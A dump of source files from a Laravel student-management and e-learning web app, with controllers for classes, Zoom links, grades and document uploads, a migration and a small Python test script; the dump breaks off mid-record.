[ { "alpha_fraction": 0.6337325572967529, "alphanum_fraction": 0.6357285380363464, "avg_line_length": 35.436363220214844, "blob_id": "a6596e4baefe0307ca06203eac0d5cf0da3c79cd", "content_id": "39471b5b279afb6963ebe1068fbfa95cbf4837fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2004, "license_type": "no_license", "max_line_length": 96, "num_lines": 55, "path": "/xml_data_processing/mainFileProcessing.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import os\nimport time\nimport json\n\nfrom xml_data_processing.downloadZipfiles import remove_old_files, \\\n    esma_registers_download, downloadZipfiles, \\\n    unzipdownload\nfrom xml_data_processing.file_logger import file_logger\nfrom xml_data_processing.xmlfileProcessingService import xmlfileprocessing, saveDictiornarytoCSV\n\n\ndef main():\n    \"\"\"\n    This is the main function, which calls all of the pipeline functions and executes them in sequence.\n    \"\"\"\n    with open(\"application.json\", encoding='utf-8') as json_config:\n        config_data = json.load(json_config)\n        logdir = config_data['logdir']\n        logfile = config_data['logfile']\n        url = config_data['url']\n        zippath = config_data['zippath']\n        xmlfile = config_data['xmlfile']\n        dltinspath = config_data['dltinspath']\n        csvDatafile = config_data['csvDatafile']\n        dltinsDir = config_data['dltinsDir']\n\n    logs = file_logger(logdir, logfile)\n    logs.logger().info(f'Configuration Information : {config_data}')\n    remove_old_files(zippath, dltinspath, xmlfile, logs)\n    time.sleep(5)\n    esma_registers_download(url, xmlfile, logs)\n    downloadZipfiles(xmlfile, zippath, logs)\n    unzipdownload(zippath, dltinspath, logs)\n    time.sleep(2.4)\n\n    headerFlag = True\n\n    for filename in os.listdir(dltinsDir):\n        if filename.endswith(\".xml\"):\n            logs.logger().info(f'Data Processing File : {filename}')\n            if os.path.isdir(dltinsDir):\n                try:\n                    dltinsfile = dltinsDir + filename\n                    logs.logger().info(f'Data Processing File : {dltinsfile}')\n                    dict_list = xmlfileprocessing(dltinsfile, logs)\n                    saveDictiornarytoCSV(dict_list, csvDatafile, headerFlag, logs)\n                    headerFlag = False\n\n                except OSError as e:\n                    logs.logger().exception(f'{e.strerror} ERROR OCCURRED.', exc_info=True)\n\n\nif __name__ == \"__main__\":\n    main()\n" }, { "alpha_fraction": 0.7994186282157898, "alphanum_fraction": 0.7994186282157898, "avg_line_length": 170.5, "blob_id": "a15b943ba8d2b9a447545a0e0a93e0105618a51c", "content_id": "0317ff45a758294fc2fb5633a179ab2e66d61d56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 344, "license_type": "no_license", "max_line_length": 324, "num_lines": 2, "path": "/README.md", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "# SteelEyeProject\nThis data pipeline (ETL) project downloads an XML file from a website and extracts the URLs of the zipped data files. It then downloads all of the zipped data files from those URLs, extracts them, and puts the XML data files into a separate directory. Finally, the XML data files are processed to extract the required information, which is written to a CSV file. 
\n" }, { "alpha_fraction": 0.5775700807571411, "alphanum_fraction": 0.5775700807571411, "avg_line_length": 28.72222137451172, "blob_id": "2789b91de84631c39eb7f58b73409244504d3096", "content_id": "f703d789ecdda7ec09f8b40576c3c5ec0df842d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, "license_type": "no_license", "max_line_length": 79, "num_lines": 18, "path": "/xml_data_processing/file_logger.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import logging\n\n\nclass file_logger():\n    \"\"\"\n    This is the logger class, which logs all events to a log file.\n    \"\"\"\n    def __init__(self, logdir, logfile):\n        self.logdir = logdir\n        self.logfile = logfile\n\n    def logger(self):\n        logs = self.logdir + self.logfile\n        logging.basicConfig(filename=logs, format='%(asctime)s %(message)s',\n                            datefmt='%m-%d-%Y %I:%M:%S %p', level=logging.INFO)\n        logger = logging.getLogger()\n        logger.setLevel(logging.DEBUG)\n        return logger\n" }, { "alpha_fraction": 0.5559653043746948, "alphanum_fraction": 0.5563991069793701, "avg_line_length": 37.09917449951172, "blob_id": "a5a88bdf76163d3b1cfc5ce1c190f2c0c3d9715a", "content_id": "ec9c3555652a6350135f2259f6fd1e16e7e47102", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4610, "license_type": "no_license", "max_line_length": 100, "num_lines": 121, "path": "/xml_data_processing/downloadZipfiles.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import glob\nimport sys\nimport requests\nimport xml.etree.ElementTree as ET\nimport os, zipfile\n\n\ndef remove_old_files(zippath, dltinspath, xmlfile, logs):\n    \"\"\"\n    This function deletes all old XML and zip files.\n    \"\"\"\n    zipfiles = glob.glob(zippath + '*.*')\n    dltinsfiles = glob.glob(dltinspath + '\\\\*.xml')\n    logs.logger().info(f'Starting function : {remove_old_files.__name__} .')\n    try:\n        os.remove(xmlfile)\n        logs.logger().info(f'{xmlfile} : old xml file is removed successfully.')\n\n    except OSError as e:\n        logs.logger().error(f'{xmlfile} has error {e.strerror}.')\n    except:\n        print(sys.exc_info()[0], \"occurred.\")\n        logs.logger().error(f'{sys.exc_info()[0]} OCCURRED.')\n\n    for zf in zipfiles:\n        try:\n            os.remove(zf)\n            logs.logger().info(f'{zf} : zipped file is removed successfully.')\n        except OSError as e:\n            logs.logger().error(f'{zf} has error {e.strerror}.')\n\n    for df in dltinsfiles:\n        try:\n            os.remove(df)\n            logs.logger().info(f'{df} : xmldata file is removed successfully.')\n        except OSError as e:\n            logs.logger().error(f'{df} has error {e.strerror}.')\n\n\ndef esma_registers_download(url, xmlfile, logs):\n    \"\"\"\n    This function downloads the initial XML file, which lists the URLs of all zip files.\n    \"\"\"\n    logs.logger().info(f'Starting function : {esma_registers_download.__name__} .')\n    try:\n        response = requests.get(url)\n        logs.logger().info(f'successfully connected : {url}')\n\n    except:\n        logs.logger().exception(f'failed to connect url : {url} ', exc_info=True)\n\n    try:\n        with open(xmlfile, 'wb') as file:\n            file.write(response.content)\n        logs.logger().info(f'{xmlfile} is downloaded successfully.')\n    except:\n        logs.logger().exception(f'{xmlfile} failed to download.', exc_info=True)\n\n\ndef downloadZipfiles(xmlfile, zippath, logs):\n    \"\"\"\n    This function downloads the zip files listed in the registry XML.\n    \"\"\"\n    logs.logger().info(f'Starting function : {downloadZipfiles.__name__} .')\n    try:\n        xmldoc = ET.parse(xmlfile)\n        
results = xmldoc.find('result')\n        logs.logger().info(f'{xmlfile} is parsed successfully and STRING \"result\" found ')\n    except:\n        logs.logger().exception(f'{xmlfile} failed to parse. {xmlfile} is not valid',\n                                 exc_info=True)\n\n    for node in results.iter():\n        for key, value in dict(node.attrib).items():\n            if value == 'download_link':\n                dltins_url = node.text\n                urllist = dltins_url.split('/')\n\n                logs.logger().info(f'url : {urllist}')\n                # 'part' avoids shadowing the built-in str\n                for part in urllist:\n                    if part.startswith('DLTINS'):\n                        file_name = part\n\n                logs.logger().info(f'filename : {file_name}')\n                file_path = zippath + file_name\n                logs.logger().info(f'file_path : {file_path}')\n\n                try:\n                    response = requests.get(dltins_url)\n                    logs.logger().info(f'successfully connected : {dltins_url}')\n                except:\n                    logs.logger().exception(f'failed to connect url : {dltins_url} ', exc_info=True)\n                try:\n                    with open(file_path, 'wb') as file:\n                        file.write(response.content)\n                    logs.logger().info(f'{file_path} is downloaded successfully.')\n                except:\n                    logs.logger().exception(f'{file_path} failed to download.', exc_info=True)\n\n\ndef unzipdownload(zippath, dltinspath, logs):\n    \"\"\"\n    It extracts the zipped files, which creates the XML data files.\n    \"\"\"\n    logs.logger().info(f'Starting function : {unzipdownload.__name__} .')\n    for filename in os.listdir(zippath):\n        if filename.endswith(\".zip\"):\n\n            if os.path.isdir(dltinspath):\n                try:\n                    zipped = zipfile.ZipFile(zippath + filename)\n                    zipped.extractall(path=dltinspath)\n                    logs.logger().info(f'{zipped} file is extracted successfully.')\n                except zipfile.BadZipfile as e:\n                    logs.logger().exception(f'{filename} is BAD ZIPPED.', exc_info=True)\n                try:\n                    # remove the zip from its download directory, not the CWD\n                    os.remove(zippath + filename)\n                    logs.logger().info(f'{filename} file is removed successfully.')\n                except OSError as e:\n                    logs.logger().exception(f'{e} is OS Error.', exc_info=True)\n" }, { "alpha_fraction": 0.531733512878418, "alphanum_fraction": 0.5333122611045837, "avg_line_length": 41.22666549682617, "blob_id": "2328e794bf7b173bae045b0d8d5e5c20e8efc3a1", "content_id": "a3ad5fcbce5b51007e034a3a17f00d6700c36b30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3167, "license_type": "no_license", "max_line_length": 101, "num_lines": 75, "path": "/xml_data_processing/xmlfileProcessingService.py", "repo_name": "sunilkrdeep/SteelEyeProject", "src_encoding": "UTF-8", "text": "import csv\nimport xml.etree.ElementTree as ET\n\n\ndef xmlfileprocessing(dltinsfile, logs):\n    \"\"\"\n    This function processes an unzipped XML file to extract the required data into a list.\n    \"\"\"\n    try:\n        dltinsTree = ET.parse(dltinsfile)\n        dltinsRoot = dltinsTree.getroot()\n        getDoc = ET.ElementTree(dltinsRoot)\n        logs.logger().info(f'{dltinsfile} is parsed successfully and started processing .........')\n    except:\n        logs.logger().exception(f'{dltinsfile} failed to parse. 
{dltinsfile} is not valid',\n                                 exc_info=True)\n    dict_list = []\n    logs.logger().info(f'{dict_list} : list is initialized')\n\n    try:\n        for TermntdRcrd in getDoc.iter():\n\n            rec_dict = {}\n            if str(TermntdRcrd.tag).split('}')[1] == 'TermntdRcrd':\n\n                for rec_attrib in TermntdRcrd:\n\n                    if str(rec_attrib.tag).split('}')[1] == 'FinInstrmGnlAttrbts':\n\n                        for FinInstrmGnlAttrbts in rec_attrib.iter():\n\n                            dict_key = str(FinInstrmGnlAttrbts.tag).split('}')[1]\n                            # Copy only the attributes needed for the CSV schema\n                            if dict_key in ('Id', 'FullNm', 'ClssfctnTp', 'CmmdtyDerivInd', 'NtnlCcy'):\n                                rec_dict[dict_key] = FinInstrmGnlAttrbts.text\n\n                    if str(rec_attrib.tag).split('}')[1] == 'Issr':\n                        rec_dict['Issr'] = rec_attrib.text\n\n                dict_list.append(rec_dict)\n        logs.logger().info(f'{dltinsfile} is processed successfully')\n    except:\n        logs.logger().exception(f'{dltinsfile} is not processed successfully.', exc_info=True)\n\n    return dict_list\n\n\ndef saveDictiornarytoCSV(rec_dict, dataCSV, headerFlag, logs):\n    \"\"\"\n    This function saves the dict_list data to a CSV file.\n    \"\"\"\n    schema = ['Id', 'FullNm', 'ClssfctnTp', 'CmmdtyDerivInd', 'NtnlCcy', 'Issr']\n    logs.logger().info(f'CSV file Schema list : {schema}')\n    try:\n        with open(dataCSV, 'a+', encoding='utf-8', newline='') as csvfile:\n            writer = csv.DictWriter(csvfile, fieldnames=schema)\n            logs.logger().info(f'{csvfile} is opened ... ')\n            if headerFlag:\n                writer.writeheader()\n                logs.logger().info(f'Header Record is written : {schema}')\n            writer.writerows(rec_dict)\n            logs.logger().info(f'Dictionary List written in file : {csvfile}')\n    except:\n        logs.logger().exception(f'{csvfile} is not written successfully.', exc_info=True)\n" } ]
5
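The SteelEyeProject record describes a three-stage pipeline: fetch a registry XML, download every zip file it links to, then flatten the unzipped instrument XML into CSV rows. The first stage hinges on a detail that is easy to miss in `downloadZipfiles`: registry nodes are matched on an attribute value equal to `download_link`, not on a tag or attribute name. Below is a minimal sketch of that extraction step, assuming the registry layout the repo's code expects; the function name and file name are illustrative.

```python
import xml.etree.ElementTree as ET


def extract_download_links(xml_path):
    """Collect the text of every node carrying a 'download_link' attribute value."""
    root = ET.parse(xml_path).getroot()
    links = []
    for node in root.iter():
        # Registry entries look like <str name="download_link">http://...</str>,
        # so the test is against attribute values, not attribute names.
        if "download_link" in node.attrib.values():
            links.append(node.text)
    return links


# Hypothetical usage against a downloaded registry file:
# for url in extract_download_links("esma_registers.xml"):
#     print(url)
```

Separating link extraction from the download loop, as sketched here, also makes this step unit-testable without network access.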
HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing
https://github.com/HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing
6bffe5efd9119061f6789ea3c46543f8c50957cd
d4531c7fee9bf0a5de855b44295ea9bf286476fa
455dfcd08daf852bc4c40d78a8c3d849cb6c253a
refs/heads/main
2023-05-23T02:45:56.915903
2021-06-18T10:15:48
2021-06-18T10:15:48
368,124,220
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6721854209899902, "alphanum_fraction": 0.6754966974258423, "avg_line_length": 17.875, "blob_id": "943b47cbce26f3e9dfefa16a30d8fb02c848302f", "content_id": "7dd4a72a75e056a4a1045dd322cb461f2fa7c123", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 302, "license_type": "no_license", "max_line_length": 54, "num_lines": 16, "path": "/app/Models/GiangVien.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Models;\n\nuse Illuminate\\Database\\Eloquent\\Factories\\HasFactory;\nuse Illuminate\\Database\\Eloquent\\Model;\n\nclass GiangVien extends Model\n{\n use HasFactory;\n protected $table='users';\n protected $attributes=[\n 'level'=>2,\n 'anh'=>'img/avata_user.png',\n ];\n}\n" }, { "alpha_fraction": 0.6270492076873779, "alphanum_fraction": 0.6270492076873779, "avg_line_length": 36.53845977783203, "blob_id": "0a12eefdaf402ab90710705453a1f664fc2adfa0", "content_id": "5aac2f993f0ee2affa0827a2a0a762999d80c52f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1959, "license_type": "no_license", "max_line_length": 108, "num_lines": 52, "path": "/app/Http/Controllers/ZoomController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\LopHoc;\nuse App\\Models\\ZoomRoom;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass ZoomController extends Controller\n{\n // public function __construct(){\n // $this->middleware('giang-vien');\n // }\n //\n public function indexOnlineClass($malop){\n $lopHoc=LopHoc::find($malop);\n $zoomClass =DB::table('zoom_rooms')->where('ma_lop',$malop)->first();\n return view('onlineClass',['lopHoc'=>$lopHoc,'zoomClass'=>$zoomClass]);\n }\n public function createZoomCLassForm($malop){\n $lopHoc=LopHoc::find($malop);\n return view('giang-vien.formCreateZoom',['lopHoc'=>$lopHoc]);\n }\n public function createZoomClass(Request $request){\n $zoomClass=new ZoomRoom();\n $zoomClass->ma_lop=$request->ma_lop;\n $zoomClass->link_zoom=$request->link_zoom;\n $zoomClass->save();\n $msg =\"thêm thành công\";\n return redirect(route('giangvien.taoZoomClass',['malop'=>$request->ma_lop]))->with('msg',$msg);\n }\n public function editZoomClass(Request $request){\n $zoomClass=ZoomRoom::where('ma_lop',$request->ma_lop)->first();\n $zoomClass->ma_lop=$request->ma_lop;\n $zoomClass->link_zoom=$request->link_zoom;\n $zoomClass->save();\n $msg =\"sửa thành công\";\n return redirect(route('giangvien.editZoomClassForm',['malop'=>$request->ma_lop]))->with('msg',$msg);\n }\n public function editZoomClassForm($malop){\n $lopHoc=LopHoc::find($malop);\n $zoomClass=DB::table('zoom_rooms')->where('ma_lop',$malop)->first();\n return view('giang-vien.formEditZoom',['lopHoc'=>$lopHoc,'zoomClass'=>$zoomClass]);\n }\n public function deleteZoomClass($id){\n $zoomClass=ZoomRoom::findOrFail($id);\n $malop=$zoomClass->ma_lop;\n $zoomClass->delete();\n return redirect(route('user.viewOnlineClass',['malop'=>$malop]));\n }\n}\n" }, { "alpha_fraction": 0.489130437374115, "alphanum_fraction": 0.532608687877655, "avg_line_length": 22, "blob_id": "b659ad6e7ef1293e7d0ccb46ab555931632deefa", "content_id": "18827b703955040e0e14f3824c066217a0285696", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 92, 
"license_type": "no_license", "max_line_length": 50, "num_lines": 4, "path": "/public/test.py", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "a = 5\nb = 6\nprint('<h2>DAMMIO.COM</h2>')\nprint('<b>Ket qua a + b bang Python:</b> ', a + b)\n" }, { "alpha_fraction": 0.5349861979484558, "alphanum_fraction": 0.5385674834251404, "avg_line_length": 34.94059371948242, "blob_id": "835f98964d111e16c0e03ef4502f0cded5164876", "content_id": "9393c6ff5bb8e22f9432b9f91294c1f149bf5453", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3644, "license_type": "no_license", "max_line_length": 115, "num_lines": 101, "path": "/app/Http/Controllers/NguoiDungController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\GiangDay;\nuse App\\Models\\GiangVien;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Hash;\n\nclass NguoiDungController extends Controller\n{\n public function __construct(){\n $this->middleware('auth');\n }\n\n public function xemThongTinNguoiDung($id)\n {\n $nguoidung = GiangVien::where('id', $id)->first();\n return view('user.thongTinNguoiDung', ['nguoidung' => $nguoidung]);\n }\n\n public function createFormSuaThongTin($id)\n {\n $nguoidung = GiangVien::where('id', $id)->first();\n return view('user.suaThongTin', ['nguoidung' => $nguoidung]);\n }\n\n public function suaThongTinCaNhan(Request $request, $id)\n {\n try {\n $nguoidung = GiangVien::where('id', $id)->first();\n $nguoidung->name = \\request('name');\n $nguoidung->email = \\request('email');\n $time1 = explode(\"/\", \\request('ngay_sinh'));\n $ngaysinh = $time1[2] . '-' . $time1[1] . '-' . $time1[0];\n $nguoidung->ngay_sinh = $ngaysinh;\n $get_image = $request->file('anh');\n if ($get_image) {\n $new_image = \\request('name') . '-' . rand(0, 99) . '.' . $get_image->getClientOriginalExtension();\n $get_image->move('upload/giangVien', $new_image);\n $nguoidung->anh = \"upload/giangVien/$new_image\";\n } else {\n if (!$nguoidung->anh) {\n $nguoidung->anh = 'img/user-alt-512.png';\n }\n }\n if (\\request('password')) {\n\n $nguoidung->password = Hash::make(\\request('password'));\n }\n// luu ket qua\n $nguoidung->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('user/sua-thong-tin/' . 
$id)->with('msg_edit', $msg_edit);\n }\n\n public function xemDSLopHoc($id)\n {\n $lophoc=DB::table('lop_hoc')->where('magv',$id)->get();\n return view('giang-vien.xemDSLop',['lophoc'=>$lophoc]);\n }\n public function xemChiTietlop($malop){\n $dssv=DB::table('diem_danh')->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n ->where('ma_lop',$malop)\n ->select('diem_danh.*','sinh_vien.anh','sinh_vien.name')\n ->get();\n return view('giang-vien.chiTietLopHoc',['dssv'=>$dssv]);\n }\n public function formCapNhapDiemCC($malop,$masv){\n $sinhvien=DB::table('diem_danh')->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n ->where('ma_lop',$malop)\n ->where('masv',$masv)\n ->select('diem_danh.*','sinh_vien.anh','sinh_vien.name')\n ->first();\n\n return view('giang-vien.suadiemccSV',['sinhvien'=>$sinhvien]);\n }\n public function capNhapDiemCC($malop,$masv){\n $giangday=GiangDay::where('masv',$masv)\n ->where('ma_lop',$malop)\n ->first();\n $giangday->diemcc=\\request('diemcc');\n $giangday->save();\n// $dssv=DB::table('diem_danh')->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n// ->where('ma_lop',$malop)\n// ->select('diem_danh.*','sinh_vien.anh','sinh_vien.name')\n// ->get();\n return redirect('user/xem-chi-tiet-lop-hoc/'.$malop);\n\n\n }\n public function formChinhSuaDiemCC($masv){\n $sinhvien= GiangDay::where('masv',$masv)->first();\n return view('giang-vien.chinhSuaDiemSV',['sinhvien'=>$sinhvien]);\n\n }\n}\n" }, { "alpha_fraction": 0.5592665076255798, "alphanum_fraction": 0.5599214434623718, "avg_line_length": 29.540000915527344, "blob_id": "5924c925f5d1fba2ea209264635e358211a2e5f4", "content_id": "1942dc4cc0020c8222a097cf45f0e15c7f364559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1548, "license_type": "no_license", "max_line_length": 84, "num_lines": 50, "path": "/app/Http/Controllers/GiangDayController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Models\\GiangDay;\nuse App\\Models\\SubjectClass;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass GiangDayController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showGiangDay(){\n $giangday=DB::table('diem_danh')\n ->join('sinh_vien','diem_danh.masv','=','sinh_vien.id')\n ->join('lop_hoc','diem_danh.ma_lop','=','lop_hoc.id')\n ->select('diem_danh.*','sinh_vien.name','lop_hoc.ten_lop')\n ->get();\n error_log($giangday);\n $lophoc=SubjectClass::all();\n return view('admin.showGiangDay',['giangday'=>$giangday,'lophoc'=>$lophoc]);\n }\n public function saveGiangDay(){\n try{\n $giangday=new GiangDay();\n $giangday->masv=\\request('masv');\n $giangday->ma_lop=\\request('ma_lop');\n $giangday->save();\n $msg_error='';\n }catch (\\Exception $e){\n $msg_error=\"có lỗi xảy ra, vui lòng thử lại\";\n }\n\n return redirect('admin/show-giang-day')->with('msg_error',$msg_error);\n }\n public function xoaGiangDay($id){\n try {\n $giangday = GiangDay::findOrFail($id);\n $giangday->delete();\n $msg_delete = \"đã xóa 1 item\";\n } catch (\\Exception $e) {\n $msg_delete = \"có lỗi vui lòng thử lại\";\n }\n return redirect('/admin/show-giang-day')->with('msg_delete', $msg_delete);\n }\n}\n" }, { "alpha_fraction": 0.5783653855323792, "alphanum_fraction": 0.5783653855323792, "avg_line_length": 32.54838562011719, "blob_id": "d1d24a3d60fe6e3cc5aa189401206677873742e6", 
"content_id": "e6c4593383cacb9d05b08a92a114de252b9a01b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2095, "license_type": "no_license", "max_line_length": 83, "num_lines": 62, "path": "/app/Http/Controllers/DocumentController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n//above in controller. có dòng này vscode mới có thể truy cập được vào webpatser\nuse Illuminate\\Support\\Str;\nuse App\\Models\\Document;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\nuse Webpatser\\Uuid\\Uuid;\n\nclass DocumentController extends Controller\n{\n //\n public function __construct(){\n $this->middleware('auth');\n }\n\n public function index($malop)\n {\n $lophoc=DB::table('lop_hoc')\n ->join('mon_hoc','mon_hoc.id','=','lop_hoc.monhoc_id')\n ->select('lop_hoc.*','mon_hoc.tenmh')\n ->where('lop_hoc.id',$malop)\n ->first();\n $documents=DB::table('documents')\n ->join('users','users.id','=','documents.user_id')\n ->select('documents.*','users.name')\n ->where('malop','=',$malop)\n ->get();\n return view('documents.index',['documents'=>$documents,'lopHoc'=>$lophoc]);\n // return view('documents.index');\n }\n\n public function create($malop)\n {\n $lophoc=DB::table('lop_hoc')\n ->join('mon_hoc','mon_hoc.id','=','lop_hoc.monhoc_id')\n ->select('lop_hoc.*','mon_hoc.tenmh')\n ->where('lop_hoc.id',$malop)\n ->first();\n return view('documents.create',['lopHoc'=>$lophoc]);\n }\n public function store(Request $request)\n {\n $document = $request->all();\n $document['uuid'] = (string)Uuid::generate();\n if ($request->hasFile('cover')) {\n $document['malop']=$request->malop;\n $document['user_id']=$request->user_id;\n $document['cover'] = $request->cover->getClientOriginalName();\n $request->cover->storeAs('documents', $document['cover']);\n }\n Document::create($document);\n return redirect()->route('documents.index',['malop'=>$request->malop]);\n }\n public function download($uuid)\n {\n $document = Document::where('uuid', $uuid)->firstOrFail();\n $pathToFile = storage_path('app/documents/' . 
$document->cover);\n return response()->download($pathToFile);\n }\n}\n" }, { "alpha_fraction": 0.5092121958732605, "alphanum_fraction": 0.5196950435638428, "avg_line_length": 32.1368408203125, "blob_id": "577e138d41bf264279ec7c48064d1fa5b1c32530", "content_id": "72017a7a45e49c50fee3f922b15b59f587e02588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3186, "license_type": "no_license", "max_line_length": 86, "num_lines": 95, "path": "/app/Http/Controllers/SubjectClassController.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nnamespace App\\Http\\Controllers;\n\n\nuse App\\Models\\GiangVien;\nuse App\\Models\\SubjectClass;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass SubjectClassController extends Controller\n{\n public function __construct()\n {\n $this->middleware('admin');\n }\n\n public function showLopHoc()\n {\n $lophoc = DB::table('lop_hoc')\n ->join('users','lop_hoc.magv','=','users.id')\n ->select('lop_hoc.*','users.name')->get();\n error_log($lophoc);\n return view('admin.showLopHoc', ['lophoc' => $lophoc]);\n }\n\n public function createLopHoc()\n {\n $giangvien=GiangVien::all();\n return view('admin.themLopHoc',['giangvien'=>$giangvien]);\n }\n\n public function saveLopHoc()\n {\n try {\n $lophoc = new SubjectClass();\n $lophoc->ten_lop = \\request('ten_lop');\n $lophoc->magv=\\request('magv');\n// $time1=strtotime(\\request('ngay_bat_dau'));\n// $ngay_bat_dau=date('Y-m-d',$time1);\n// $time2=strtotime(\\request('ngay_ket_thuc'));\n// $ngay_ket_thuc=date('Y-m-d',$time2);\n $time1=explode(\"/\",\\request('ngay_bat_dau'));\n $ngay_bat_dau=$time1[2].'-'.$time1[1].'-'.$time1[0];\n $lophoc->ngay_bat_dau=$ngay_bat_dau;\n $time2=explode(\"/\",\\request('ngay_ket_thuc'));\n $ngay_ket_thuc=$time2[2].'-'.$time2[1].'-'.$time2[0];\n $lophoc->ngay_ket_thuc=$ngay_ket_thuc;\n $lophoc->save();\n $msg = \"thêm thành công\";\n } catch (\\Exception $e) {\n $msg = \"có lỗi xảy ra vui lòng thử lại\";\n }\n return redirect('admin/them-lop-hoc')->with('msg', $msg);\n }\n\n public function suaLopHoc($id)\n {\n $lophoc = SubjectClass::where('id', $id)->first();\n $giangvien=GiangVien::all();\n return view('admin.suaLopHoc', ['lophoc' => $lophoc,'giangvien'=>$giangvien]);\n }\n\n public function editLopHoc($id)\n {\n try {\n $lophoc = SubjectClass::where('id', $id)->first();\n $lophoc->ten_lop = \\request('ten_lop');\n $lophoc->magv=\\request('magv');\n $time1=explode(\"/\",\\request('ngay_bat_dau'));\n $ngay_bat_dau=$time1[2].'-'.$time1[1].'-'.$time1[0];\n $lophoc->ngay_bat_dau=$ngay_bat_dau;\n $time2=explode(\"/\",\\request('ngay_ket_thuc'));\n $ngay_ket_thuc=$time2[2].'-'.$time2[1].'-'.$time2[0];\n $lophoc->ngay_ket_thuc=$ngay_ket_thuc;\n $lophoc->save();\n $msg_edit = \"chỉnh sửa thành công\";\n } catch (\\Exception $e) {\n $msg_edit = \"chỉnh sửa thất bại\";\n }\n return redirect('admin/sua-lop-hoc/' . 
$id)->with('msg_edit', $msg_edit);\n }\n\n public function xoaLopHoc($id)\n {\n try {\n $lophoc = SubjectClass::findOrFail($id);\n $lophoc->delete();\n $msg_delete = \"đã xóa 1 item\";\n } catch (\\Exception $e) {\n $msg_delete = \"có lỗi vui lòng thử lại\";\n }\n return redirect('/admin/show-lop-hoc')->with('msg_delete', $msg_delete);\n }\n}\n" }, { "alpha_fraction": 0.5515021681785583, "alphanum_fraction": 0.5515021681785583, "avg_line_length": 24.189189910888672, "blob_id": "aa0b1ab936a0e2448353a2a2fef80a68c86a53f7", "content_id": "4df77dd85b657e96643bf73ed89419f42a520da1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 932, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": "/database/migrations/2021_04_22_164430_create_lop_hoc_table.php", "repo_name": "HieuDepZaii/he-thong-quan-ly-sinh-vien-tich-hop-elearing", "src_encoding": "UTF-8", "text": "<?php\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateLopHocTable extends Migration\n{\n /**\n * Run the migrations.\n *\n * @return void\n */\n public function up()\n {\n Schema::create('lop_hoc', function (Blueprint $table) {\n $table->id();\n $table->unsignedBigInteger('monhoc_id');\n $table->foreign('monhoc_id')->references('id')->on('mon_hoc');\n $table->unsignedBigInteger('magv');\n $table->foreign('magv')->references('id')->on('users');\n $table->date('ngay_bat_dau')->nullable();\n $table->date('ngay_ket_thuc')->nullable();\n $table->timestamps();\n });\n }\n\n /**\n * Reverse the migrations.\n *\n * @return void\n */\n public function down()\n {\n Schema::dropIfExists('lop_hoc');\n }\n}\n" }, { "alpha_fraction": 0.49939197301864624, "alphanum_fraction": 0.5034455060958862, "avg_line_length": 29.456790924072266, "blob_id": "ca227e68a4649915d48b375f28080d9965a6e8a8", "content_id": "55b945accb30c07487bad3f1d02c2b2f5d38faf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", 